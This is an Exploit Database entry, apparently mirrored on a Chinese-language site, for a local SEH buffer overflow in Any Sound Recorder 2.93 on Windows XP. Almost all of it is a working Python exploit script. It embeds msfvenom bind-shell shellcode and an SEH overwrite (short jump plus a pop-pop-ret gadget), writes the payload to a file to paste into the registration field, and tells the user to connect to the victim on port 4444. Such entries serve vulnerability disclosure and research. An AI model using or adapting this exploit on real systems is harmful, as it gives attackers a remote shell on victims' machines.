Any Sound Recorder 2.93 – Buffer Overflow (SEH)

• Exploit Database
• 19 阅读

• 作者： Abdullah Alıç
  日期： 2018-10-17
• 类别：

  • local
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/45627/

• # Exploit Title: Any Sound Recorder 2.93 - Buffer Overflow (SEH)
  # Exploit Author: Abdullah Alic
  # Discovery Date: 2018-10-16
  # Homepage: http://www.any-sound-recorder.com
  # Software Link: http://www.any-sound-recorder.com/anysoundrecorder.exe
  # Version: 2.93 
  # Tested on: Windows XP Professional sp3 (ENG)
  # Steps to Reproduce: Run the python exploit script, it will create a new file
  # with the name "boom.txt". Copy the content of the"boom.txt". 
  # Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register" 
  # Connect victim machine on port 4444
  
  #!/usr/bin/python 
  
  #Payload size: 355 bytes
  #msfvenom -p windows/shell_bind_tcp-b "\x00\x0a\x0d" -f python
  buf =""
  buf += "\xb8\x67\x21\x25\x53\xdd\xc0\xd9\x74\x24\xf4\x5b\x31"
  buf += "\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x8c\xdd\xc7"
  buf += "\xa6\xae\xf6\x8a\x49\x4e\x07\xeb\xc0\xab\x36\x2b\xb6"
  buf += "\xb8\x69\x9b\xbc\xec\x85\x50\x90\x04\x1d\x14\x3d\x2b"
  buf += "\x96\x93\x1b\x02\x27\x8f\x58\x05\xab\xd2\x8c\xe5\x92"
  buf += "\x1c\xc1\xe4\xd3\x41\x28\xb4\x8c\x0e\x9f\x28\xb8\x5b"
  buf += "\x1c\xc3\xf2\x4a\x24\x30\x42\x6c\x05\xe7\xd8\x37\x85"
  buf += "\x06\x0c\x4c\x8c\x10\x51\x69\x46\xab\xa1\x05\x59\x7d"
  buf += "\xf8\xe6\xf6\x40\x34\x15\x06\x85\xf3\xc6\x7d\xff\x07"
  buf += "\x7a\x86\xc4\x7a\xa0\x03\xde\xdd\x23\xb3\x3a\xdf\xe0"
  buf += "\x22\xc9\xd3\x4d\x20\x95\xf7\x50\xe5\xae\x0c\xd8\x08"
  buf += "\x60\x85\x9a\x2e\xa4\xcd\x79\x4e\xfd\xab\x2c\x6f\x1d"
  buf += "\x14\x90\xd5\x56\xb9\xc5\x67\x35\xd6\x2a\x4a\xc5\x26"
  buf += "\x25\xdd\xb6\x14\xea\x75\x50\x15\x63\x50\xa7\x5a\x5e"
  buf += "\x24\x37\xa5\x61\x55\x1e\x62\x35\x05\x08\x43\x36\xce"
  buf += "\xc8\x6c\xe3\x7b\xc0\xcb\x5c\x9e\x2d\xab\x0c\x1e\x9d"
  buf += "\x44\x47\x91\xc2\x75\x68\x7b\x6b\x1d\x95\x84\x82\x82"
  buf += "\x10\x62\xce\x2a\x75\x3c\x66\x89\xa2\xf5\x11\xf2\x80"
  buf += "\xad\xb5\xbb\xc2\x6a\xba\x3b\xc1\xdc\x2c\xb0\x06\xd9"
  buf += "\x4d\xc7\x02\x49\x1a\x50\xd8\x18\x69\xc0\xdd\x30\x19"
  buf += "\x61\x4f\xdf\xd9\xec\x6c\x48\x8e\xb9\x43\x81\x5a\x54"
  buf += "\xfd\x3b\x78\xa5\x9b\x04\x38\x72\x58\x8a\xc1\xf7\xe4"
  buf += "\xa8\xd1\xc1\xe5\xf4\x85\x9d\xb3\xa2\x73\x58\x6a\x05"
  buf += "\x2d\x32\xc1\xcf\xb9\xc3\x29\xd0\xbf\xcb\x67\xa6\x5f"
  buf += "\x7d\xde\xff\x60\xb2\xb6\xf7\x19\xae\x26\xf7\xf0\x6a"
  buf += "\x56\xb2\x58\xda\xff\x1b\x09\x5e\x62\x9c\xe4\x9d\x9b"
  buf += "\x1f\x0c\x5e\x58\x3f\x65\x5b\x24\x87\x96\x11\x35\x62"
  buf += "\x98\x86\x36\xa7"
  
  junk = 10000 
  nseh= "\xeb\x06\x90\x90" # SHORT JMP 6 bytes 
  seh= "\x35\x2f\xd1\x72"# 0x72d12f35 : pop ebx # pop ebp # ret 0x0cFROM msacm32.drv
  
  buffer = "\x90" * 900 + nseh + seh + buf + "\x90" * (junk-len(buf))
  payload = buffer
  
  #badchars \x00 \x0a \x0d
  
  try:
  f=open("boom.txt","w")
  print "[+] Creating %s bytes payload..." %len(payload)
  f.write(payload)
  f.close()
  print "[+] File created!"
  except:
  print "File cannot be created"